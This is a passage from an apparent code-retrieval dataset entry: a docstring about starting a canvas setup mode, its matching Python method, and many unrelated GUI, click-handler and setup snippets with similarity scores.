'commandFunc'):\n self.canvas[\"items\"][self.index].commandFunc(None)", "def _action(self):\n pass", "def action(self, target, text):\n raise NotImplementedError", "def _on_dclick(self, object):\n if self.window is not None:\n self.window.edit(object)", "def click(self, element):\n element.click()", "def on_mouse_click(self, event):\n if not self.is_game_over:\n try:\n # i, j coordinates of the click event\n i = int(round(event.ydata))\n j = int(round(event.xdata))\n\n # Left button\n if event.button == 1 or event.button == 2:\n self.reveal(i, j)\n\n # Right button\n elif event.button == 3:\n self.flag(i, j)\n\n except (TypeError, IndexError):\n pass", "def right_click(self, *args):\n return _ida_hexrays.Hexrays_Hooks_right_click(self, *args)", "def on_click(self, event):\n if event['button'] == 1 and 'button1' in self.options:\n subprocess.call(self.options['button1'].split())\n elif event['button'] == 2 and 'button2' in self.options:\n subprocess.call(self.options['button2'].split())\n elif event['button'] == 3 and 'button3' in self.options:\n subprocess.call(self.options['button3'].split())", "def perform_action(self, action_data):\n pass", "def actions(self):\n raise NotImplementedError", "def act(self, state):\n return", "def OnAccept(self, event):\n pass", "def action(self, arg):\n\n print(arg)\n\n if arg[\"Type\"] == \"SoKeyboardEvent\" and arg[\"Key\"] == \"ESCAPE\":\n self.finish()\n\n elif arg[\"Type\"] == \"SoLocation2Event\":\n self.point, ctrlPoint, self.info = gui_tool_utils.getPoint(self, arg)\n gui_tool_utils.redraw3DView()\n\n elif (arg[\"Type\"] == \"SoMouseButtonEvent\" and\n arg[\"State\"] == \"DOWN\" and\n arg[\"Button\"] == \"BUTTON1\"):\n\n if arg[\"Position\"] == self.pos:\n return self.finish(False, cont=True)\n\n if (not self.node) and (not self.support):\n gui_tool_utils.getSupport(arg)\n self.point, ctrlPoint, self.info = gui_tool_utils.getPoint(self, arg)\n print(gui_tool_utils.getPoint(self, arg))\n\n if self.point:\n self.point = FreeCAD.Vector(self.info[\"x\"], self.info[\"y\"], self.info[\"z\"])\n self.ui.redraw()\n self.pos = arg[\"Position\"]\n self.node.append(self.point)\n self.drawSegment(self.point)\n if len(self.node) > 2:\n # The wire is closed\n if (self.point - self.node[0]).Length < utils.tolerance():\n self.undolast()\n if len(self.node) > 2:\n self.finish(True, cont=True)\n else:\n self.finish(False, cont=True)", "def action(self, arg):\n\n print(arg)\n\n if arg[\"Type\"] == \"SoKeyboardEvent\" and arg[\"Key\"] == \"ESCAPE\":\n self.finish()\n\n elif arg[\"Type\"] == \"SoLocation2Event\":\n self.point, ctrlPoint, self.info = gui_tool_utils.getPoint(self, arg)\n gui_tool_utils.redraw3DView()\n\n elif (arg[\"Type\"] == \"SoMouseButtonEvent\" and\n arg[\"State\"] == \"DOWN\" and\n arg[\"Button\"] == \"BUTTON1\"):\n\n if arg[\"Position\"] == self.pos:\n return self.finish(False, cont=True)\n\n if (not self.node) and (not self.support):\n gui_tool_utils.getSupport(arg)\n self.point, ctrlPoint, self.info = gui_tool_utils.getPoint(self, arg)\n print(gui_tool_utils.getPoint(self, arg))\n\n if self.point:\n self.point = FreeCAD.Vector(self.info[\"x\"], self.info[\"y\"], self.info[\"z\"])\n # self.ui.redraw()\n self.pos = arg[\"Position\"]\n self.node.append(self.point)\n self.drawSegment(self.point)\n if len(self.node) > 2:\n # The wire is closed\n if (self.point - self.node[0]).Length < utils.tolerance():\n self.undolast()\n if len(self.node) > 2:\n self.finish(True, cont=True)\n else:\n self.finish(False, cont=True)", "def RightClick(self):\n self._PressRightButton()\n self._ReleaseAllButtons()", "def click(cls, user, link):\n pass", "def on_click_return(self, event):\n self.on_click_callable(event[\"target\"])", "def clickDone(self):\n\n # Hide done button\n self.clickDone.place_forget()\n\n # Hide all ships and their names\n self.canvas.tag_lower('ship')\n self.canvas.tag_lower('text')\n self.canvas.tag_bind('square', '<Button-1>', self.fire)\n self.players.updateWidget()\n\n # If opponent is computer, unbind left-click trigger\n # This prevents user from left-clicking\n if game2.isComputer == 1:\n self.canvas.tag_unbind('square', '<Button-1>')\n self.players.frame1.title(\"%s's turn\" % self.players.usernames[1])\n self.players.frame2.title(\"%s's turn\" % self.players.usernames[0])\n showDialogBox(\"%s's turn first\" % self.players.usernames[0])", "def context_click(self, elem):\n ActionChains(self.driver).context_click(elem).perform()", "def doEvent(self, source):\n pass", "def action_run(self):\n pass", "def select_action(self, state):", "def on_mouse_press(self, x, y, button):\n\n pass", "def action(self,item):\r\n pass", "def play(self):\n self.accept(\"wheel_up\", self.scrollindex, [-1] )\n self.accept(\"wheel_down\", self.scrollindex, [1] )\n self.accept(\"arrow_up\", self.scrollindex, [-1] )\n self.accept(\"arrow_down\", self.scrollindex, [1] )\n self.accept(\"enter\", self._click)\n if callable(self.data['exit']): self.accept(\"escape\", self.data['exit'])\n for item in self.canvas[\"items\"]: item['state']=DGG.NORMAL", "def take_action(self, action):\n\t\traise NotImplementedError", "def fake_click(self, x, y):\n # Currently only restacks windows, and does not trigger bindings\n self.manager.c.eval(\n textwrap.dedent(\n f\"\"\"\n self.core.warp_pointer({x}, {y})\n self.core._focus_by_click()\n \"\"\"\n )\n )", "def act(self, ob_no):\n raise NotImplementedError", "def do_action(self):\n func = self._get_action_func()\n func(self)", "def choose_action(self, obs, **kwargs):\n pass", "def chooseAction(self):\n print \"nothing\"\n pass", "def click(self):\n element = self.element\n WebDriverWait(self._browser, TMO).until(\n lambda browser: element.is_displayed())\n time.sleep(0.1) # Just some pacing.\n element.click()", "def sense_and_act(self):\n pass", "def actions() -> None:\n pass", "def display(self):\n\t\tprint('The button in the window was clicked!')" ]
[ "0.7291359", "0.66233146", "0.660782", "0.65884537", "0.63273966", "0.62724835", "0.6255575", "0.6255575", "0.62212914", "0.61557615", "0.6118316", "0.61125875", "0.6065794", "0.6064975", "0.6038785", "0.599528", "0.59859943", "0.5957505", "0.59489393", "0.59387773", "0.59387773", "0.5929002", "0.5917446", "0.5917446", "0.5917446", "0.5917446", "0.5896101", "0.5896101", "0.5896101", "0.5896101", "0.5871146", "0.5870784", "0.58227426", "0.5807545", "0.5793374", "0.57836527", "0.5782985", "0.5768511", "0.5740707", "0.57318413", "0.57305324", "0.5728183", "0.5717806", "0.5715963", "0.57157016", "0.5714274", "0.57106197", "0.5710545", "0.57052296", "0.57051647", "0.5698197", "0.5686558", "0.5684432", "0.5676047", "0.5672097", "0.56656307", "0.56498784", "0.56371766", "0.5620025", "0.5613249", "0.5608101", "0.56000674", "0.5598441", "0.5584717", "0.55826014", "0.55754954", "0.55714244", "0.557027", "0.5566007", "0.5553893", "0.5551669", "0.5547545", "0.5537865", "0.55223477", "0.5521098", "0.55150205", "0.5513829", "0.5508528", "0.54981136", "0.5485925", "0.5475583", "0.54740304", "0.5460999", "0.54517573", "0.5445661", "0.54444236", "0.5442715", "0.5440428", "0.54398906", "0.5437513", "0.54212856", "0.5419304", "0.5414346", "0.5411164", "0.540765", "0.54033166", "0.53974706", "0.53973", "0.5393808", "0.5365337", "0.53591007" ]
0.0
-1
Respond to theme load ins here
def load_theme_values(self): pass
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def on_load_theme (self):\n\n\t\tif self.has_started:\n\t\t\tself.init_buffers()\n\t\t\tself.redraw_background()\n\t\t\tself.redraw_foreground()", "def on_load(self):\n pass", "def on_load(self):\n pass", "def onStartup(event):\n\n plugins = getPlugins()\n\n for themeDirectory in iterDirectoriesOfType(THEME_RESOURCE_NAME):\n if themeDirectory.directory in reload_paths: # only for sauna.reload!\n pluginSettings = getPluginSettings(themeDirectory, plugins)\n\n for name, plugin in plugins:\n plugin.onDiscovery(themeDirectory.__name__,\n pluginSettings[name],\n pluginSettings)", "def on_load(self):", "def dummy_loader(cls, context):\n log.warning(\"theme is not set -- add a theme value to your site settings\")\n theme_json = DEFAULT\n hasher = hashlib.md5()\n hasher.update(theme_json.encode(\"utf-8\"))\n theme_hash = hasher.hexdigest()\n\n theme_data = json.loads(theme_json)\n\n theme_data[\"_moya\"] = {\"path\": None, \"hash\": theme_hash}\n return theme_data", "def _post_load(self):\n pass", "def on_load(self):\n self.__init__()", "def handle_reload_toolbox(self):", "async def _theme_heist(self, ctx, theme):\r\n theme = theme.title()\r\n guild = ctx.guild\r\n\r\n if not os.path.exists(str(bundled_data_path(self)) + \"/{}.txt\".format(theme)):\r\n themes = [os.path.join(x).replace('.txt', '')\r\n for x in os.listdir(str(bundled_data_path(self))) if x.endswith(\".txt\")]\r\n msg = (\"I could not find a theme with that name. Available Themes:\"\r\n \"```\\n{}```\".format('\\n'.join(themes)))\r\n else:\r\n msg = await self.thief.theme_loader(guild, theme)\r\n\r\n await ctx.send(msg)", "def use_my_theme():\n # register and enable the theme\n alt.themes.register(\"my_theme\", my_theme)\n alt.themes.enable(\"my_theme\")", "def use_my_theme():\n # register and enable the theme\n alt.themes.register(\"my_theme\", my_theme)\n alt.themes.enable(\"my_theme\")", "def request_plugins(self):", "def on_startup(self) -> None:\n ...", "def postLoad(self):\n pass", "def refresh(self):\n self._themes = {}\n for theme in starchain(ldr(self.app) for ldr in self.loaders):\n if self.valid_app_id(theme.application):\n self.themes[theme.identifier] = theme\n self.register_theme_assets()", "def __init_on_load__(self):", "def on_init(self):\n self.write_log(\"策略初始化\")\n self.load_bar(1)", "def post_setup(self, context):\n pass", "def load(self):\n\n super().load()\n self.check_dcss()\n self.check_discord()", "def loader(cls, fs):\n\n def load(context=None):\n if context is None:\n context = pilot.context\n name = context.get(\".sys.site.theme\", \"default\")\n\n path = \"{}.json\".format(name)\n try:\n theme = cls.read(fs, path, context=context)\n except Exception as e:\n log.warning(\"unable to read theme file '%s' (%s)\", path, text_type(e))\n\n if name != \"default\":\n return load(\"default\")\n\n log.error(\"unable to load 'default' theme\")\n theme = None\n\n return theme\n\n return load", "def init_ui(self):\n self.parent.title(\"Roku Player Controller\")\n self.style.theme_use(\"default\")", "def packaged_themes_loader(app):\n themes_path = os.path.join(app.root_path, 'themes')\n if os.path.exists(themes_path):\n return load_themes_from(themes_path)\n else:\n return ()", "def on_init(self):\n self.write_log(\"策略初始化\")\n\n self.load_bar(10)", "def on_init(self):\n self.write_log(\"策略初始化\")\n self.load_bar(10)", "def on_init(self):\n self.write_log(\"策略初始化\")\n self.load_bar(10)", "def before_request():\r\n\r\n\tinit_classes()", "def plugin_loaded():\n events.broadcast(\"plugin_loaded\")", "def updateTheme(self):\n self.myUpdate(stateDict=None)", "def post_start(self):", "def on_start(self):\n self.init()", "def initialize(context):", "def initialize(context):", "def initialize(context):", "def initialize(context):", "def initialize(context):", "def initialize(context):", "def initialize(context):", "def initialize(context):", "def initialize(context):", "def initialize(context):", "def initialize(context):", "def initialize(context):", "def initialize(context):", "def initialize(context):", "def initialize(context):", "def initialize(context):", "def initialize(context):", "def initialize(context):", "def initialize(context):", "def on_init(self):\n self.write_log(\"策略初始化\")\n self.exchange_load_bar(self.exchange)", "def __macroLoad(self):\n self.activeWindow().macroLoad()", "def widget_load_config(self, plugman):\r\n pass", "def _post_hooks(self):", "def __init__(self, theme_dir):\n\n if not os.path.isdir(theme_dir): \n print(\"%s not a valid directory, please check!\" % theme_dir, file=sys.stderr)\n sys.exit(1)\n for dirname, dirnames, filenames in os.walk(theme_dir):\n for subdirname in dirnames:\n full_path = os.path.join(dirname, subdirname)\n self.theme_dir.append(full_path)\n print(\"read theme %s\" % full_path, file=sys.stdout)\n print(\"all themes loaded!\", file=sys.stdout)", "def onInit(self):\n pass", "def on_start(self, ctx):\n pass", "def force_load(self):\n pass", "def on_window_ready(self):\n pass", "def on_show_view(self):\n self.setup()", "def on_show_view(self):\n self.setup()", "def on_show_view(self):\n self.setup()", "def _hook(self):", "def load_site_if_needed(self):\n self.site.reload_if_needed()", "def setup_hooks(self):\n pass", "def run():\r\n autostartup()\r\n\r\n if settings.FEATURES.get('USE_CUSTOM_THEME', False):\r\n enable_theme()\r\n\r\n if settings.FEATURES.get('USE_MICROSITES', False):\r\n enable_microsites()\r\n\r\n if settings.FEATURES.get('ENABLE_THIRD_PARTY_AUTH', False):\r\n enable_third_party_auth()", "def template_loader(self):\n return None", "def on_start(self):\n pass", "def on_start(self):\n pass", "def on_start(self):\n pass", "def on_start(self):\n pass", "def on_start(self):\n pass", "def on_start(self):\n pass", "def on_start(self):\n pass", "def on_start(self):\n pass", "def ready(self):\n #Restart the service by loading static resources,\n #such as user dictionary\n #jieba.load_userdict(jieba_words_path)\n #jieba.analyse.set_stop_words(jieba_stop_words_path)\n pass", "def setup_theme(app):\r\n theme = app.config['THEME']\r\n app.template_folder = os.path.join('themes', theme, 'templates')\r\n app.static_folder = os.path.join('themes', theme, 'static')", "def prepare_UI(self):", "def OnStartup(cls, modName ):\r\n import sys\r\n targetMod = sys.modules[ modName ]\r\n cls.StartupVarsInjectToMod( targetMod )\r\n EasyIpyMagics.RegisterMagics()\r\n \r\n cls.RegisterPostExecute()", "async def _themelist_heist(self, ctx):\r\n themes = [os.path.join(x).replace('.txt', '')\r\n for x in os.listdir(str(bundled_data_path(self))) if x.endswith(\".txt\")]\r\n if len(themes) > 30:\r\n themes = themes[:30]\r\n await ctx.send(\"Available Themes:```\\n{}```\".format('\\n'.join(themes)))", "def on_start(self):", "def on_start(self):", "def _afterInit(self):\n pass", "def msg_app_init(self,msg):\r\n #load the main window layouts (in aui mixin class)\r\n self.frame.LoadLayouts()", "def prePresent(self, request):", "def loadTheme(self, name = \"default\"):\n themes = os.listdir(\"themes\")\n if name in themes:\n self.templates = {}\n files = glob.glob(\"themes/%s/*.tpl\" % name)\n for file in files:\n f = open(file)\n data = \"\\n\".join(f.readlines())\n f.close()\n\n key = file.replace(\".tpl\", \"\").split(os.path.sep)[-1]\n self.templates[key] = data", "def call(self, **kwargs):\n # Get additional resources links\n css = []\n for path in (\"creative/vendor/bootstrap/css/bootstrap.min.css\",\n \"creative/vendor/font-awesome/css/font-awesome.min.css\",\n \"creative/vendor/magnific-popup/magnific-popup.css\",\n \"creative/css/creative.css\"):\n css.append(self._cw.data_url(path))\n js = []\n for path in (\"creative/vendor/jquery/jquery.min.js\",\n \"creative/vendor/bootstrap/js/bootstrap.min.js\",\n \"creative/vendor/scrollreveal/scrollreveal.min.js\",\n \"creative/vendor/magnific-popup/jquery.magnific-popup.min.js\",\n \"creative/js/creative.js\"):\n js.append(self._cw.data_url(path))\n\n # Format template\n template = self._cw.vreg.template_env.get_template(\"startup.jinja2\")\n html = template.render(\n header_url=self._cw.data_url(\"creative/img/neurospin.jpg\"),\n login_url=self._cw.build_url(\n \"login\", __message=u\"Please login with your account.\"),\n contact_email=self._cw.vreg.config.get(\n \"administrator-emails\", \"noreply@cea.fr\"),\n css_url=css,\n js_url=js)\n self.w(html)", "def _post_init(self):\n pass", "def setHeader(object, event):\n\n request = event.request\n\n if isThemeEnabled(request):\n request.environ['HTTP_X_THEME_ENABLED'] = True", "def on_hook(self) -> None:", "def is_request_in_themed_site():\n # We need to give priority to theming/site-configuration over microsites\n return configuration_helpers.is_site_configuration_enabled()", "def includeme(config):\n config.add_subscriber(add_renderer_globals, BeforeRender)\n config.add_subscriber(add_localizer, NewRequest)\n config.add_subscriber(add_csrf_validation, NewRequest)\n config.add_subscriber(add_resources, NewRequest)", "def on_first_registration(self):\n self.main.tabify_plugins(self.main.help, self)\n self.dockwidget.hide()", "def pre_start(self) -> None:\n pass", "def plugin_loaded():\n # Required for sublime.packages_path().\n # ST only \"loads resources\" from the Packages dir.\n global _temp_path\n packages_path = sublime.packages_path()\n _temp_path = os.path.join(packages_path, _temp_dir_name)\n\n _remove_temp_path()", "def on_setup(self, request, trigger_context):\n raise NotImplementedError", "def on_run(self):\r\n\r\n\t\tpass", "def do_post_install(self, context):\n pass", "def load(self):\n self._really_load()", "def __init__(self,_dir,_theme='skyblue'):\n self.dir=_dir\n self.theme = _theme" ]
[ "0.68556285", "0.66520184", "0.66520184", "0.6610389", "0.64057696", "0.62862283", "0.61794144", "0.6151126", "0.6137831", "0.59524107", "0.59130126", "0.59130126", "0.5907942", "0.58921796", "0.58286834", "0.58206403", "0.57867295", "0.5769557", "0.576859", "0.5764957", "0.5720274", "0.5701185", "0.5699979", "0.56952167", "0.5665115", "0.5665115", "0.5621124", "0.5608668", "0.55465263", "0.5542513", "0.54998344", "0.5487861", "0.5487861", "0.5487861", "0.5487861", "0.5487861", "0.5487861", "0.5487861", "0.5487861", "0.5487861", "0.5487861", "0.5487861", "0.5487861", "0.5487861", "0.5487861", "0.5487861", "0.5487861", "0.5487861", "0.5487861", "0.5487861", "0.54845905", "0.54710096", "0.5439414", "0.5433515", "0.54309165", "0.5415859", "0.53732824", "0.53657484", "0.5352102", "0.5347691", "0.5347691", "0.5347691", "0.53476447", "0.53388315", "0.53263646", "0.5299717", "0.5295351", "0.5293231", "0.5293231", "0.5293231", "0.5293231", "0.5293231", "0.5293231", "0.5293231", "0.5293231", "0.5270107", "0.52678543", "0.5260779", "0.52593684", "0.52437246", "0.5230329", "0.5230329", "0.5228736", "0.52254605", "0.5224555", "0.52210116", "0.5220132", "0.5213221", "0.5212543", "0.5203986", "0.51985514", "0.5182398", "0.51803684", "0.5179706", "0.51779217", "0.51762635", "0.517243", "0.51707774", "0.5169845", "0.5167688" ]
0.6718465
1
Starts a setup mode that is used for moving, resizing and other various changes that the user might setup
def start_setup(self, setup_type): # Persist the user preferences when we end our setup if (self.setup_type != "" and not setup_type): self.setup_type = setup_type rect = self.canvas.get_rect() self.x = int(rect.x) self.y = int(rect.y) self.width = int(rect.width) self.height = int(rect.height) self.preferences.persist_preferences({ self.id + '_x': self.x, self.id + '_y': self.y, self.id + '_width': self.width, self.id + '_height': self.height }) # Start the setup state elif self.setup_type != setup_type: self.setup_type = setup_type if (self.setup_type == "position"): x, y = ctrl.mouse_pos() self.canvas.move(x, y)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def setup():\n setFormat()\n setFilename()\n setScreenMode()", "def setup_mode():\n status_label.color = WHITE\n status_label.text = \"-SET-\"\n\n ave_label.color = BLACK # Turn off average label and value display\n ave_value.color = BLACK\n\n max_value.text = str(MAX_RANGE_F) # Display maximum range value\n min_value.text = str(MIN_RANGE_F) # Display minimum range value\n\n time.sleep(0.8) # Show SET status text before setting parameters\n status_label.text = \"\" # Clear status text\n\n param_index = 0 # Reset index of parameter to set\n\n setup_state = \"SETUP\" # Set initial state\n while setup_state == \"SETUP\":\n # Select parameter to set\n setup_state = \"SELECT_PARAM\" # Parameter selection state\n while setup_state == \"SELECT_PARAM\":\n param_index = max(0, min(2, param_index))\n status_label.text = SETUP_COLORS[param_index][0]\n image_group[param_index + 226].color = BLACK\n status_label.color = BLACK\n time.sleep(0.25)\n image_group[param_index + 226].color = SETUP_COLORS[param_index][1]\n status_label.color = WHITE\n time.sleep(0.25)\n\n param_index -= get_joystick()\n\n _buttons = panel.events.get()\n if _buttons and _buttons.pressed:\n if _buttons.key_number == BUTTON_UP: # HOLD button pressed\n param_index = param_index - 1\n if _buttons.key_number == BUTTON_DOWN: # SET button pressed\n param_index = param_index + 1\n if _buttons.key_number == BUTTON_HOLD: # HOLD button pressed\n play_tone(1319, 0.030) # Musical note E6\n setup_state = \"ADJUST_VALUE\" # Next state\n if _buttons.key_number == BUTTON_SET: # SET button pressed\n play_tone(1319, 0.030) # Musical note E6\n setup_state = \"EXIT\" # Next state\n\n # Adjust parameter value\n param_value = int(image_group[param_index + 230].text)\n\n while setup_state == \"ADJUST_VALUE\":\n param_value = max(32, min(157, param_value))\n image_group[param_index + 230].text = str(param_value)\n image_group[param_index + 230].color = BLACK\n status_label.color = BLACK\n time.sleep(0.05)\n image_group[param_index + 230].color = SETUP_COLORS[param_index][1]\n status_label.color = WHITE\n time.sleep(0.2)\n\n param_value += get_joystick()\n\n _buttons = panel.events.get()\n if _buttons and _buttons.pressed:\n if _buttons.key_number == BUTTON_UP: # HOLD button pressed\n param_value = param_value + 1\n if _buttons.key_number == BUTTON_DOWN: # SET button pressed\n param_value = param_value - 1\n if _buttons.key_number == BUTTON_HOLD: # HOLD button pressed\n play_tone(1319, 0.030) # Musical note E6\n setup_state = \"SETUP\" # Next state\n if _buttons.key_number == BUTTON_SET: # SET button pressed\n play_tone(1319, 0.030) # Musical note E6\n setup_state = \"EXIT\" # Next state\n\n # Exit setup process\n status_label.text = \"RESUME\"\n time.sleep(0.5)\n status_label.text = \"\"\n\n # Display average label and value\n ave_label.color = YELLOW\n ave_value.color = YELLOW\n return int(alarm_value.text), int(max_value.text), int(min_value.text)", "def startMode(self):\n raise NotImplementedError('startMode() should be implemented')", "def setUp(self):\r\n self.caption = \"mirra extending classes\" # window name\r\n self.size = 640, 480 #window size\r\n self.pos = 100,100 # window top left location\r\n self.fullScreen = 0 # if fullScreen is on it will overwrite your pos and size to match the display's resolution\r\n self.frameRate = 15 # set refresh framerate\r", "def setup(self):\n # if not system.restore_snapshot():\n # self.log.debug(\"No snapshot to restore, if this is not expected please contact automation team\")\n crindsim.set_mode(\"manual\")\n pos.connect()\n pos.sign_on()", "def aimMode_Setup(self, state):\n\n pass", "def renderSetup(style, *args):\n # set up confirm dialog to pop up window to do these things (replace the orig buttons and partial command)\n dial = cmds.confirmDialog(t=\"Render Setup\", message=\"Choose how you'd like to initially setup the current scene:\", button=[\"Generic\", \"Arnold\", \"Maxwell\", \"VRay\", \"Cancel\"])\n\n if dial != \"Cancel\":\n # sets the common setting regarless\n lgt.setCommon()\n\n if dial == \"Arnold\":\n lgt.setArnold()\n if dial == \"Vay\":\n lgt.setVray()\n if dial == \"Maxwell\":\n lgt.setMaxwell()", "def setup():\r\n #this happens just once\r\n size(width, height) #instead of create_canvas\r", "def on_setup_btn(self):\n if self.state == self.INIT:\n self.send_rtsp_request(self.SETUP)", "def setup(self):\n # Create your sprites and sprite lists here\n self.game: Game = Game(SCREEN_WIDTH, SCREEN_HEIGHT, TILE_SIZE, 1, grid_layers = 4)\n self.game.game_message = \"Lead the Rabbit home\"\n\n # show the menu so that we see the instructions\n self.game.menu.button_list[0].text = \"Start\"\n self.game.menu.is_visible = True", "def change_mode(self):\n master.destroy()\n os.system(\"add_mode_run.py\")", "def setup_game(self):", "def setUp(self):\n #if UI object not found. the watcher method will be invoked\n d.watcher('AUTO_FC_WHEN_ANR').when(text='ANR').when(text='强行关闭') .press('enter')\n d.wakeup() #wakeup device ", "def setup_pymol():\n pymol.finish_launching() # Prevent threading errors\n # Configure global settings\n cmd.set('scene_buttons', 1)\n cmd.set('matrix_mode', 1)\n cmd.set('movie_panel', 1)\n # Configure quality settings\n cmd.mset(\"1 x500\")\n cmd.set('ray_trace_frames', 1)\n cmd.viewport(800, 800)", "def setup(self): \n # Navigate to POS screen\n pos.connect()", "def screen_setup(screen_size):\n window = turtle.Screen()\n window.bgcolor(\"black\")\n window.title(\"Maze Game\")\n window.setup(screen_size, screen_size)", "def _display_setup(self):\r\n display_file = \"{}/display.json\".format(self.settings_dir)\r\n with open(display_file) as json_file:\r\n win_settings = json.load(json_file)\r\n self.win = visual.Window(**win_settings)\r\n framerate = self.win.fps()\r\n self.frame_duration = 1.0/framerate\r\n self.mouse = event.Mouse(visible=False, win=self.win)", "def do_activate(self, *args, **kwargs):\n self.register_signals()\n self.perform_setup()\n assert self.main_window\n self.main_window.show()\n self.hold()", "def start_new_game(self, mode): \n self.display.clear() \n #self.ui.hide()\n if self.selected_speed == \"speed Slow\":\n self.game_manager.set_players_speed(1.9)\n elif self.selected_speed == \"speed Medium\":\n self.game_manager.set_players_speed(3)\n elif self.selected_speed == \"speed Fast\":\n self.game_manager.set_players_speed(5)\n self.game_manager = GameManager(self.display, self.ui, mode, GameState.Running, self.game_manager.player1, self.game_manager.player2)", "def start(self):\r\n self.setDriver('ST', 1)", "def ready(self):\r\n\t\t# Remove attract mode from mode queue - Necessary?\r\n\t\tself.game.modes.remove(self)\r\n\t\t# Initialize game\t\r\n\t\tself.game.start_game()\r\n\t\t# Add the first player\r\n\t\tself.game.add_player()\r\n #self.game.add_player()\r\n\t\t# Start the ball. This includes ejecting a ball from the trough.\r\n\t\tself.game.start_ball()", "def onClick(self):\n self.app.setActiveMode(\"start\")", "def start(self):\n self.active = True", "def start(self):\n # asserts preconditions are met\n #assert self.validGameSettings()\n\n #draws initial welcome screen\n #self._text = GLabel(text=\"Press 'S' to Play\")\n #self._text.draw(self.view)\n\n # initializing instance variables\n self.setState(STATE_INACTIVE)\n self.setWave(None)\n self.setText(None)\n self.lastkeys = 0 #ADD MORE ATTRIBUTES\n\n # draws iniital welcome screen\n self.welcomeScreen()", "def setup_callback():\n self.setup_window.deiconify()", "def on_pre_enter(self):\n self.setup()\n self.start()", "def enable_setup(self):\n self.high_ver_entry.config(state=\"normal\")\n self.low_ver_entry.config(state=\"normal\")\n self.left_hor_entry.config(state=\"normal\")\n self.right_hor_entry.config(state=\"normal\")", "def enable_start(self, *args):\n but_start.configure(state=GL.NORMAL)", "def open(self):\n windowFlags = self.getWindowFlags(self.settings)\n self.surface = pygame.display.set_mode(self._resolution, windowFlags)\n self._printVideoInfo(pygame.display.Info())\n logger.info(\"Initialized display with driver: \" + pygame.display.get_driver())\n\n self.surface.fill(self._skin.guiColor(\"Background\"))\n self._initializePanels(self._resolution, self._skin)\n pygame.display.flip()\n\n self._statusLoop.statusProvider = self.getStatusProvider(self.settings)", "def setupNewGame(self):\r\n self.level = 1\r\n self.num_cows = 2\r\n self.num_farmers = 1\r\n self.levelHeading = Text(self.gameDisplay, 120, 425, 175, self.light_orange, \"Farm 1\")\r\n self.shield_indicator.image = self.greenShield\r\n updatedHeading = self.levelHeading\r\n self.startUX[0] = updatedHeading", "def setup_window(self, fullscreen, dual):\n cv2.startWindowThread()\n if fullscreen:\n cv2.namedWindow(self.wname, cv2.WINDOW_NORMAL)\n else:\n cv2.namedWindow(self.wname)\n cv2.namedWindow(self.wname)\n cv2.setWindowProperty(self.wname, cv2.WND_PROP_FULLSCREEN, cv2.WINDOW_FULLSCREEN)\n\n if dual:\n # Move is to make sure it's on the right monitor\n cv2.moveWindow(self.wname, 1920, 0)\n cv2.namedWindow(self.wname + ' Small View')\n cv2.resizeWindow(self.wname + ' Small View', 960, 540)", "def snakeSetup(self,display):\n if display:\n self.screen = pygame.display.set_mode(windowSize)\n pygame.display.set_caption('Snake!')\n pygame.init()\n self.clock = pygame.time.Clock()\n self.dir = left #round(3 * random.random())\n self.s = snake(playerColor, unitSize,self.dir)\n self.setup = True", "def set_preset_mode(self,filename):\n try:\n self.mainwindow.setVisible(False)\n for area in self.dockarea.tempAreas:\n area.window().setVisible(False)\n\n self.splash_sc.show()\n QtWidgets.QApplication.processEvents()\n self.splash_sc.raise_()\n self.splash_sc.showMessage('Loading Modules, please wait',color = Qt.white)\n QtWidgets.QApplication.processEvents()\n self.clear_move_det_controllers()\n QtWidgets.QApplication.processEvents()\n\n\n move_modules, detector_modules= self.set_file_preset(filename)\n self.update_status('Preset mode ({}) has been loaded'.format(os.path.split(filename)[1]),log_type='log')\n self.settings.child('loaded_files', 'preset_file').setValue(os.path.split(filename)[1])\n self.move_modules = move_modules\n self.detector_modules = detector_modules\n\n ######################################################################\n #set scan selector\n items = OrderedDict()\n if self.navigator is not None:\n items[\"Navigator\"] = dict(viewers=[self.navigator.viewer], names=[\"Navigator\"])\n for det in self.detector_modules:\n if len([view for view in det.ui.viewers if view.viewer_type=='Data2D']) != 0:\n items[det.title] = dict(viewers=[view for view in det.ui.viewers if view.viewer_type == 'Data2D'],\n names=[view.title for view in det.ui.viewers if view.viewer_type == 'Data2D'],)\n items[\"DAQ_Scan\"] = dict(viewers=[self.ui.scan2D_graph], names=[\"DAQ_Scan\"])\n\n if self.navigator is not None:\n items = OrderedDict(Navigator=dict(viewers=[self.navigator.viewer], names=[\"Navigator\"]))\n items.update(self.scanner.scan_selector.viewers_items)\n\n self.scanner.viewers_items = items\n\n self.scanner.scan_selector.widget.setVisible(False)\n self.scanner.scan_selector.settings.child('scan_options', 'scan_type').hide()\n\n self.scanner.scan_selector.widget.setVisible(False)\n self.scanner.scan_selector.show_scan_selector(visible=False)\n\n #####################################################\n self.overshoot_manager = OvershootManager(det_modules=[det.title for det in detector_modules], move_modules=[move.title for move in move_modules])\n #load overshoot if present\n file = os.path.split(self.preset_file)[1]\n path = os.path.join(overshoot_path, file)\n if os.path.isfile(path):\n self.set_overshoot_configuration(path)\n\n\n #connecting to logger\n for mov in move_modules:\n mov.log_signal[str].connect(self.add_log)\n mov.init_signal.connect(self.update_init_tree)\n for det in detector_modules:\n det.log_signal[str].connect(self.add_log)\n det.init_signal.connect(self.update_init_tree)\n #setting moves and det in tree\n preset_items_det=[]\n preset_items_move=[]\n items_det=[module.title for module in detector_modules]\n if items_det!=[]:\n preset_items_det=[items_det[0]]\n\n items_move=[module.title for module in move_modules]\n if items_move!=[]:\n preset_items_move=[items_move[0]]\n\n self.settings.child('Move_Detectors', 'Detectors').setValue(dict(all_items=items_det, selected=preset_items_det))\n self.settings.child('Move_Detectors', 'Moves').setValue(dict(all_items=items_move, selected=preset_items_move))\n self.settings.child('scan_options', 'plot_from').setLimits(preset_items_det)\n if preset_items_det!=[]:\n self.settings.child('scan_options', 'plot_from').setValue(preset_items_det[0])\n\n self.splash_sc.close()\n self.mainwindow.setVisible(True)\n for area in self.dockarea.tempAreas:\n area.window().setVisible(True)\n self.show_average_dock(False)\n\n self.ui.scan_dock.setEnabled(True)\n self.file_menu.setEnabled(True)\n self.settings_menu.setEnabled(True)\n self.overshoot_menu.setEnabled(True)\n\n self.create_new_file(True)\n self.update_init_tree()\n\n except Exception as e:\n\n self.update_status(getLineInfo()+ str(e), self.wait_time, log_type='log')", "def setupWindow(self):\n\n\t\tself.main_menu_window = 